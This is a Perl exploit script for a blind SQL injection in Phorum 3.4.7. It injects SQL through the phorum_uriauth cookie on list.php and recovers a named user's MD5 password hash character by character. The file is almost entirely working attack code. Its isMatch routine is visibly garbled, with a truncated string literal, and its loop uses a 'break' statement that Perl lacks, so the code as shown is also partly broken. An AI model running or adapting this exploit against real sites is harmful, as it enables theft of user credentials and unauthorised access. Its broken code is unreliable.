#!/usr/bin/perl ##################################################################################################### # # # # # Sql injection exploit for Phorum 3.4.7 # # # # For details look at http://www.waraxe.us/index.php?modname=sa&id=19 # # # # # ##################################################################################################### $remote = 'localhost'; # hostname of the target $port = 80; # port number, usually 80 $url = '/phorum347'; # path to Phorum, without ending "/" $username = 'test'; # username, who's info we will pull out #---------------------------------------------------------------------------------------------------- use IO::Socket; @chars = ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'); $data = ''; $md5hash = ''; $url .= '/list.php?f=1'; for($nr=1;$nr<33;$nr++) { for($cnt=0;$cnt<16;$cnt++) { $charx = @chars[$cnt]; $uriauth = "$username%2527%20AND%20MID(password," . $nr . ',1)=%2527' . $charx .'%2527/*'; $cookie = "phorum_uriauth=$uriauth"; $data = MakeGetRequest($remote, $url ,$cookie); $match = isMatch($data); $logline = "pos --> " . $nr . " ,char for test --> " . $charx . " --> " . $match; print $logline . "\n"; if($match == 1) { $md5hash .= @chars[$cnt]; $logline = "current md5hash --> " . $md5hash; print $logline . "\n"; break; } } } $logline = "Final md5hash --> " . $md5hash; print $logline . "\n"; exit(); sub MakeGetRequest() { $socket = IO::Socket::INET->new(PeerAddr => $remote, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldnt connect to $remote:$port : $@\n"; $str = "GET " . $url . " HTTP/1.0\r\n"; print $socket $str; print $socket "Cookie: $cookie\r\n"; print $socket "Host: $remote\r\n\r\n"; $buff = ""; while ($answer = <$socket>) { $buff .= $answer; } close($socket); return $buff; } sub isMatch($data) { $idx1 = index($data," -1) { $bingo = 1; } else { $bingo = 0; } return $bingo; }